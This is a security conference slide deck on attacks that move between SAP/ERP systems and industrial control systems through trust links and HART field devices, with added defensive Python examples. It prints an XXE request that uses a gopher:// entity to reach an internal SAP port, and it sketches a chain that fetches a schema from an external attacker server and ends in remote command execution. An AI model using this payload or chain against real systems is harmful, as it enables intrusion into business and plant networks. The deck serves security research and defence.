1. Invest in security to secure investments

Business Breakdown: Vulnerabilities in ERP via ICS and ICS via ERP

Alexander Polyakov
CTO ERPScan, President EAS-SEC
2. About ERPScan

•  The only 360-degree SAP Security solution - ERPScan Security Monitoring Suite for SAP
•  Leader by the number of acknowledgements from SAP (150+)
•  60+ presentations at key security conferences worldwide
•  25 awards and nominations
•  Research team - 20 experts with experience in different areas of security
•  Headquarters in Palo Alto (US) and Amsterdam (EU)
3. What do they look like

[Landscape diagram: Portal, HR, BW, ECC, Billing, Suppliers, Customers, Banks, Insurance, Partners, Branches, BI, IS, CRM, PAS/EAS, MES, SRM, SCADA/DCS, OPC, PLCs, Field Devices, SolMan, SAP AS, XI/PI]
4. How popular they are

SAP
•  More than 246000 customers worldwide
•  86% of Forbes 500

Oracle
•  100% of Fortune 100

Microsoft
•  More than 300,000 businesses worldwide choose Microsoft Dynamics ERP and CRM software
5. What can happen

•  Espionage
   –  Theft of financial information
   –  Trade secret theft
   –  Supplier and customer list theft
   –  HR data theft
   –  Other corporate data theft
•  Sabotage
   –  Denial of service
   –  Modification of financial statements
   –  Access to technology network (SCADA/ICS) by trust relations
•  Fraud
   –  False transactions
   –  Modification of master data
6. What do they look like

[Same landscape diagram as on slide 3: Portal, HR, BW, ECC, Billing, Suppliers, Customers, Banks, Insurance, Partners, Branches, BI, IS, CRM, PAS/EAS, MES, SRM, SCADA/DCS, OPC, PLCs, Field Devices, SolMan, SAP AS, XI/PI]
7. How easy is that

Systems should be connected with each other

•  Directly
   –  ERP collects information from PAS/EAS
•  Indirectly
   –  ERP shares a database with MES/EAS
   –  ERP is connected with ICS/SCADA via an XI or PI system
•  In one network
   –  Exploit typical vulnerabilities, such as password sniffing
•  In different networks
   –  Exploit trust relations
8. Internet to Internal

•  Via Internet resources (SAP Portal/CRM/SRP)
•  Via partners (SAP XI)
•  Via SAP Router
•  Via workstations (Trojans)
•  Via unnecessary SAP services in Internet
9. How to break SAP?

At least:
•  Unnecessary privileges
•  Misconfigurations
•  Vulnerabilities
•  Custom code issues
10. Unnecessary privileges

•  One example: Create vendor + Approve payment order
•  Usually ((~100 roles x 10 actions)^2)/2 = 500k
•  500k potential conflicts for each user!
•  A lot of work
•  Usually takes two years to decrease conflicts from millions to hundreds.
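The slide's example (create vendor + approve payment order) as a minimal Segregation-of-Duties check, added here and not part of the deck or of any SAP tool; role names, action names and the conflict rules are constructed, and real SAP authorizations are far more granular than "role -> set of actions".

```python
# Added example (not from the deck): a minimal Segregation-of-Duties (SoD)
# check of the kind the slide describes. Roles, actions and the conflict
# rules are constructed for illustration.
from itertools import combinations

# Constructed sample data: which business actions each role grants.
ROLE_ACTIONS = {
    "Z_AP_CLERK":   {"create_vendor", "change_vendor"},
    "Z_AP_MANAGER": {"approve_payment_order"},
    "Z_PURCHASER":  {"create_purchase_order"},
    "Z_SUPERUSER":  {"create_vendor", "approve_payment_order", "post_payment"},
}

# Constructed conflict rules: action pairs one person must not hold together.
# The first pair is the slide's example (create vendor + approve payment order).
SOD_RULES = {
    frozenset({"create_vendor", "approve_payment_order"}): "fictitious vendor payout",
    frozenset({"create_purchase_order", "approve_payment_order"}): "self-approved purchase",
}

def potential_pairs(n_roles, actions_per_role):
    """The rough estimate used on the slide: (roles * actions)^2 / 2."""
    return (n_roles * actions_per_role) ** 2 // 2

def effective_actions(user_roles, role_actions=ROLE_ACTIONS):
    """Union of the actions granted by all of a user's roles."""
    return set().union(*(role_actions.get(r, set()) for r in user_roles))

def find_sod_conflicts(user_roles, role_actions=ROLE_ACTIONS, rules=SOD_RULES):
    """Return (action_a, action_b, description) for every violated rule.

    A conflict counts whether both actions come from one role or from two
    different roles on the same user; the cross-role case is what makes
    the analysis expensive on a real landscape.
    """
    actions = effective_actions(user_roles, role_actions)
    hits = []
    for a, b in combinations(sorted(actions), 2):
        desc = rules.get(frozenset({a, b}))
        if desc:
            hits.append((a, b, desc))
    return hits

def audit_users(user_roles_map):
    """Map each user to its SoD conflicts (an empty list means clean)."""
    return {u: find_sod_conflicts(roles) for u, roles in user_roles_map.items()}

if __name__ == "__main__":
    users = {
        "alice": ["Z_AP_CLERK", "Z_AP_MANAGER"],  # conflict across two roles
        "bob":   ["Z_PURCHASER"],                 # clean
        "carol": ["Z_SUPERUSER"],                 # conflict inside one role
    }
    for user, conflicts in audit_users(users).items():
        print(user, conflicts or "clean")
    print("estimate for 100 roles x 10 actions:", potential_pairs(100, 10))
```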
  
11. Misconfigurations

~1500 profile parameters
~1200 web applications
~700 web services
~100 specific commands for mmc
~100 specific checks for each of the 50 modules
12. Misconfigurations

1.  Lack of patch management
2.  Default passwords
3.  Unnecessary enabled functionality
4.  Remotely enabled administrative services
5.  Insecure configuration
6.  Unencrypted communications
7.  Internal access control and SoD
8.  Insecure trust relations
9.  Monitoring of security events
13. Vulnerabilities

Only one vulnerability is enough to get access to ALL business-critical DATA

[Chart: SAP security notes per year, 2001-2014; y axis 0-900]

By July 2014 – 3000+ notes
14. From ERP to ICS

Some systems should be connected at least on the network layer.

•  SAP RFC links
•  Database links
•  Same domain
•  Similar passwords

TRUST CONNECTIONS – the main issue!
15. From ICS to ERP

PART 2 (From ICS to ERP)
16. From ICS/Devices to ERP

•  USB (like Stuxnet)
•  Wireless devices (usually bad encryption)
•  Wired devices (need physical access)
•  Attack on wire (low-level field protocols)
   –  RS485
   –  Profibus PA
   –  FF H1
   –  HART
17. Big Big Company

[Image slide]
18. What do they look like

[Same landscape diagram as on slide 3: Portal, HR, BW, ECC, Billing, Suppliers, Customers, Banks, Insurance, Partners, Branches, BI, IS, CRM, PAS/EAS, MES, SRM, SCADA/DCS, OPC, PLCs, Field Devices, SolMan, SAP AS, XI/PI]
19. From ICS to ERP

[Network diagram with nodes: Corporate network, ERP, MES, Routers/Firewalls, OPC, SCADA/DCS, HMI, Industrial bus, PLC1, PLC2,3…, PLC7,8…, Field devices]
20. From ICS to ERP

•  HART (current loop, 4-20 mA)
•  Mostly used in power plants, chemical factories, oil & gas industry
•  Every field device (in general, every device) in a PAS industrial facility hierarchy has a unique ID
•  For HART devices, the HART long tag is used as a universal ID
•  HART tag (8 bytes packed ASCII) and HART long tag (32 bytes ASCII) are used as application layer address
21. Vulnerabilities

DEMO Infrastructure

[Diagram with nodes: Corporate network, ERP, Firewall (only HTTP traffic allowed), Ethernet, FieldCare (PAS), HART modem, Current loop (HART analog 4-20mA line), Transmitter]
22. Vulnerabilities

ICSCorsair board
23. Attack Scheme

[Attack scheme diagram, six numbered steps. Components: Attacker, current loop, HART transmitter, HART gateway/master, PAS (FieldCare), evil web server on the Internet, ERP. Labels: HART Command 22, long tag change packet, XML data, XMLI (A' xmlns='x-schema:http://q45.ru), request for remote XSD schema, reply (XSD with SSRF), SSRF, SAP remote command execution exploit query, RCE]
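For the tag formats on slide 20 and the long-tag XML injection on this slide, an added example of how a PAS or asset-management component can treat HART tags defensively; it is not from the deck or from any HART vendor. The packed-ASCII layout (four 6-bit characters per 3 bytes, so an 8-character tag occupies 6 bytes) and the Command 22 long-tag length (32 bytes, ISO Latin-1) follow the HART specification; the XML record shape, the tag allowlist and the sample payload are assumptions made for the example.

```python
# Added example (not from the deck or any HART product): decode HART tags
# and embed a long tag into XML as data, so a tag carrying markup cannot
# change the document structure. The allowlist is an assumed naming policy.
import re
import xml.etree.ElementTree as ET

LONG_TAG_LEN = 32  # bytes carried by HART Command 22 (Write Long Tag)
SAFE_TAG = re.compile(r"^[A-Za-z0-9 ._/-]*$")  # assumed plant naming policy

def packed_ascii_decode(data):
    """Decode HART packed ASCII: each 6-bit value maps to ASCII 0x20..0x5F."""
    if len(data) % 3:
        raise ValueError("packed ASCII comes in 3-byte groups")
    chars = []
    for i in range(0, len(data), 3):
        chunk = int.from_bytes(data[i:i + 3], "big")
        for shift in (18, 12, 6, 0):
            v = (chunk >> shift) & 0x3F
            chars.append(chr(v if v & 0x20 else v | 0x40))
    return "".join(chars)

def packed_ascii_encode(text):
    """Inverse of packed_ascii_decode; only 0x20..0x5F (upper case) is encodable."""
    if len(text) % 4:
        raise ValueError("packed ASCII needs a multiple of 4 characters")
    out = bytearray()
    for i in range(0, len(text), 4):
        chunk = 0
        for ch in text[i:i + 4]:
            code = ord(ch)
            if not 0x20 <= code <= 0x5F:
                raise ValueError(f"{ch!r} not representable in packed ASCII")
            chunk = (chunk << 6) | (code & 0x3F)
        out += chunk.to_bytes(3, "big")
    return bytes(out)

def decode_long_tag(payload):
    """Extract the long tag from a Command 22 data field and trim padding."""
    if len(payload) != LONG_TAG_LEN:
        raise ValueError(f"long tag must be exactly {LONG_TAG_LEN} bytes")
    return payload.decode("latin-1").rstrip(" \x00")

def long_tag_is_acceptable(tag):
    """Allowlist check: a tag containing XML or URL syntax is not a plant tag."""
    return bool(SAFE_TAG.match(tag))

def device_record_xml(tag):
    """Embed the tag as an attribute value; ElementTree escapes it for us."""
    dev = ET.Element("device")
    dev.set("tag", tag)
    return ET.tostring(dev)

def parsed_tag(xml_bytes):
    """Parse the record back; returns (element name, tag attribute)."""
    root = ET.fromstring(xml_bytes)
    return root.tag, root.get("tag", "")

if __name__ == "__main__":
    # Constructed Command 22 payload in the shape of the slide's injected tag.
    hostile = b"A' xmlns='x-schema:http://evil/".ljust(LONG_TAG_LEN)
    tag = decode_long_tag(hostile)
    print("acceptable:", long_tag_is_acceptable(tag))  # False -> alert the operator
    print(device_record_xml(tag))                      # still a plain attribute
    print(packed_ascii_decode(packed_ascii_encode("PT-101  ")))
```

Rejecting the tag at the allowlist is the control; the escaping in device_record_xml is defence in depth for tags that are accepted.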
  
24. From ERP to ICS

•  SSRF http://cwe.mitre.org/data/definitions/918.html
•  Second place in Top 10 web application techniques 2012
•  Allows bypassing firewall restrictions and connecting directly to protected systems via connected systems
25. SSRF

[Diagram: Server A (Portal or XI), 192.168.0.1, and Server B (ERP, HR, BW etc.), 172.16.0.1. The request below goes to Server A; the bytes AAAAAAAAAAAAA arrive at Server B on port 3300, as if sent with "telnet 172.16.0.1 3300"]

Request sent to Server A:

    POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
    Host: 192.168.0.1:8000

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >]>
    <foo>&date;</foo>
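An added, gateway-side check for the XXE-to-SSRF pattern shown on this slide (not code from the deck or from SAP): the XML body is refused if it declares a DTD, and any external entity identifiers are reported for logging. The sample body is the slide's own request body; the allowed-scheme policy and the "internal host" rule are assumptions made for this example.

```python
# Added example (not from the deck, not SAP code): detect and refuse XML
# bodies that declare a DTD or external entities before they reach a SOAP
# adapter. Policy values are assumptions for the example.
import ipaddress
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # assumed: nothing else may be fetched
DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.IGNORECASE)
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?:%\s+)?(?P<name>\S+)\s+"
    r"(?:SYSTEM|PUBLIC\s+\"[^\"]*\")\s*[\"'](?P<uri>[^\"']+)[\"']",
    re.IGNORECASE,
)

# The slide's request body, used here as the sample input.
SAMPLE = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >]>
<foo>&date;</foo>"""

def is_internal_host(host):
    """True for loopback, private and link-local addresses and 'localhost'."""
    try:
        return not ipaddress.ip_address(host).is_global
    except ValueError:
        return host.lower() == "localhost"

def inspect_xml(body):
    """List (kind, detail) findings for DTD and external-entity constructs."""
    text = body.decode("latin-1", errors="replace")
    findings = []
    if DOCTYPE_RE.search(text):
        findings.append(("dtd", "document declares a DTD"))
    for m in ENTITY_RE.finditer(text):
        name, uri = m.group("name"), m.group("uri")
        parts = urlsplit(uri)
        if parts.scheme.lower() not in ALLOWED_SCHEMES:
            findings.append(("scheme", f"entity {name}: scheme {parts.scheme!r} not allowed"))
        host = parts.hostname or ""
        if is_internal_host(host):
            findings.append(("internal-target", f"entity {name}: {host}:{parts.port}"))
    return findings

def parse_or_refuse(body):
    """Fail closed: only DTD-free, entity-free bodies reach the XML parser."""
    findings = inspect_xml(body)
    if findings:
        raise ValueError("refused: " + "; ".join(d for _, d in findings))
    return ET.fromstring(body)

if __name__ == "__main__":
    for kind, detail in inspect_xml(SAMPLE):
        print(f"[{kind}] {detail}")
    benign = b"<?xml version='1.0'?><foo>hello</foo>"
    print("benign parsed:", parse_or_refuse(benign).text)
```

The findings are what a WAF or the adapter's own logging would emit for the slide's request: a DTD, a non-HTTP scheme, and a private-range target host.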
  
26. Conclusion

•  Critical networks are complex
•  A system is as secure as its most insecure component
•  Holistic approach
•  Check eas-sec.org
